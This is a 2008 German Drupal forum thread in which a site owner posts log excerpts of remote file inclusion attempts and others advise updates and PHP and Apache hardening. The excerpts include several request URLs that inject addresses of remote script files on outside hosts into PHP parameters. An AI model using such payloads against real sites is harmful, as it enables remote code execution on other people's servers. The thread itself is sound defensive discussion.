Info zu "Hackversuchen"
Eingetragen von Jim (25)am 15.10.2008 - 10:58 Uhr in
Hallo zusammen,
wie ich gerade im Log festgestellt habe versuchen seit ein paar Tagen irgendwelche Trollos meine Webseite zu "hacken". Vielleicht sind die folgenden Infos ja für den ein oder anderen User auch von Interesse. Hier mal die entsprechenden Infos aus dem Log (Seite nicht gefunden) von Drupal (Auszug):
IP: 200.199.75.194
http://meine_Domain//cgi/browser/methodTable.php?cfg[AmfphpPath]=http://www.severo-zapad.ru//i/alb_id.txt?
IP: 200.199.75.194
http://meine_Domain//cgi/browser/methodTable.php?cfg[AmfphpPath]=http://www.severo-zapad.ru//i/alb_id.txt?
IP: 203.22.204.202
http://meine_Domain//cgi/browser/ServiceBrowser.php?_basedir=http://www....?
IP: 62.149.238.228
http://meine_Domain/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.geocities.com/ixan_xdet/safe.txt?Da bei mir noch die Version 5.7 eingesetzt wird, werd' ich jetzt wohl erstmal auf die aktuelle Version 5.11 updaten, in der Hoffnung das dadurch schon mal wieder etwas mehr Sicherheit vorhanden ist. Ein sperren der IPs (bzw. ganzer IP-Bereiche) per Zugriffsrechte oder htaccess macht wohl keinen Sinn, da diese Trollos über IPs aus Südamerika, Russland, USA usw. kommen.
Falls jemand noch irgendwelche Tipps oder Empfehlungen bzgl. der "Hackversuche" hat, dann immer her damit.
Gruß Jim
- Anmelden oder Registrieren um Kommentare zu schreiben
Das ist ganz normal. Du
am 15.10.2008 - 11:10 Uhr
Das ist ganz normal. Du würdest dich wundern was am Tag so alles auf einem Server und allen seinen Diensten versucht wird.
Neben der Aktualisierung der Webanwendung kannst du beim Shared Hosting herzlich wenig machen. Als Server-Admin hast du natürlich viel mehr Möglichkeiten Vorsorge zu treffen, um es Hackern so schwierig wie möglich zu machen. Letzten Endes bleibt Sicherheit aber immer relativ.
--
Webseiter
Hallo Alexander, Alexander
am 19.10.2008 - 13:45 Uhr
Hallo Alexander,
Das ist ganz normal. Du würdest dich wundern was am Tag so alles auf einem Server und allen seinen Diensten versucht wird.
jo - wem sagst Du das: Ich hab' auch noch einen eigenen Server mit div. Seiten und Foren im Einsatz und auch da ist das immer ein "Hase und Igel Spiel".
Naja - hab' jetzt eben mal das Update auf die Version 5.11 gemacht und hoffe das ich damit etwas mehr an Sicherheit gewonnen habe.
Gruß Jim
Wenn du einen eigenen Server
am 19.10.2008 - 14:13 Uhr
Wenn du einen eigenen Server hast, kannst du ja PHP mit suhosin Patch einsetzen und den Apache mit ModSecurity erweitern, etc.
--
Webseiter
Alexander Langer
am 19.10.2008 - 16:08 Uhr
Wenn du einen eigenen Server hast, kannst du ja PHP mit suhosin Patch einsetzen und den Apache mit ModSecurity erweitern, etc.
Ne - wie Du vorher schon richtig getippt hast läuft die Drupal-Seite, um die's hier geht, auf einem gesharten Server und da kann ich natürlich nichts weiter machen. Ausser ein paar Dinge per php.ini, wie z.B. allow_url_fopen = off
Gruß Jim